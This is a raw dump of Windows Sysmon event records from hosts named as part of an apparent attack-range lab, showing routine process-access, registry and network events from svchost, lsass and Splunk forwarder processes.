11:24:21.518{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298858Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:21.518{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298857Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:21.518{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298856Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:21.518{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298855Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:21.518{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-1965-6216-6707-000000003802}4232C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000298854Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:21.518{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1965-6216-6707-000000003802}4232C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000298853Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:21.520{C8EA50B7-1965-6216-6707-000000003802}4232C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000298852Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:21.137{C8EA50B7-1964-6216-6607-000000003802}42404372C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000222685Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:22.943{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F4137A9B4544CDFCC4FB95E24D7768BF,SHA256=5CD1FC782B7F4486161B9D8C68BB1CF400AC15BE7CA72C1233A621D72555FDAA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298862Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:22.546{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=86549AA951812C0EFC6CAFEA7F24A29B,SHA256=ED856C098739CF256EC04388F860892102C521C16A7BD9C842BCC6D5CA7D3E4D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298863Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:23.546{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B565F16E0988E378D78195C8575BC90E,SHA256=2D59EE58B131C9E98E314E29BF047CAFDF585F8D8326F7F321397A2D2B89B2F9,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000298865Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:22.688{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49568-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000298864Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:24.562{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2AF5E8AD12C898DF7C784A649B9E76D5,SHA256=AA63DA9C68C452FF0B61AD066E3A8D36F244F0535E1D32C5203C2B6C03A72B45,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222686Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:24.006{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0FA463EE5BFED8AEDB692855FF4B3E4D,SHA256=0D02BE28361AD36278508EC256D9157A66CBB6DE68B6013CEA41285E87F63E7F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298866Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:25.562{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0D4DE47C6C081BDEFDBCB19357EE5215,SHA256=7541FAC54BC979369F81E03C96F0356EE60C34F409BB09EC5F8446F90766CEA2,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000222688Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:23.696{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51735-false10.0.1.12-8000- 23542300x8000000000000000222687Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:25.022{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AC3081DA45C2DE75DE209496896907D0,SHA256=AE7B87D6F3B86F08571E0E4CB57622F29E4CDFAFC0EE481FFED9A25D9877DA8B,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000298877Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:24:26.762{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x8000000000000000298876Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:24:26.762{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x009d87f1) 13241300x8000000000000000298875Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:24:26.762{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d8289f-0x88987dd9) 13241300x8000000000000000298874Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:24:26.762{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d828a7-0xea5ce5d9) 13241300x8000000000000000298873Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:24:26.762{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d828b0-0x4c214dd9) 13241300x8000000000000000298872Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:24:26.762{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x8000000000000000298871Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:24:26.762{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x009d87f1) 13241300x8000000000000000298870Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:24:26.762{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d8289f-0x88987dd9) 13241300x8000000000000000298869Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:24:26.762{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d828a7-0xea5ce5d9) 13241300x8000000000000000298868Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:24:26.762{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d828b0-0x4c214dd9) 23542300x8000000000000000298867Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:26.577{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E9236F55F6EF65A760C8FA3A72C79E9C,SHA256=355861029B36729D8A49718F89E57E6D9B1B8787B1875A63B067ED82CC6D1159,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222689Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:26.240{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE8D7E7A3380CFC991595A1584FBF840,SHA256=BC68B7BE41F03550BBDA04E8A56F00937FF6E8CADA822472F521FE0FE8115612,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298878Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:27.608{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FD76024C96D2BC29E9FC56CDCAF699D7,SHA256=32D7AC056612CC2CD296220028172A5D05B0FDBD27553387C36394542619BFE2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222690Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:27.272{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9FBB350AFA34703F01056959830255EE,SHA256=6EC576504A608533503F070703AF7998F7B97FE0EA37F56856B88F1A5B352899,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298879Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:28.627{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EC56355089A848CE5C1D1787D2E482C9,SHA256=31D837EB32D117086341344000E2CD492C46525D1924F1E0910FB029ACD592F6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222691Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:28.287{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3C1BF2BB34892B980E6FDC3DB6C21C99,SHA256=C72F618F7E5F033677A618F35D84E5E92DB4912712A46D49DA5D5F1C5FB731EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298880Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:29.645{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=67AC42ABD6EE9B5D5AE80C07593E59B7,SHA256=AAD77F216EAC88A48399C55D4B6BEF936085DAB1790ABF60B3555C976BA64364,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222692Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:29.303{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3CB3704408305CA90ABE57A602ADDC9F,SHA256=0CFF71D9631B1DC8FEA4B294A25157329B7E0BB837F66B95AD2898EDCA3DA568,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000298919Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:30.744{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298918Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:30.744{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298917Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:30.744{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298916Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:30.744{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298915Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:30.744{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298914Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:30.744{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298913Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:30.744{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298912Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 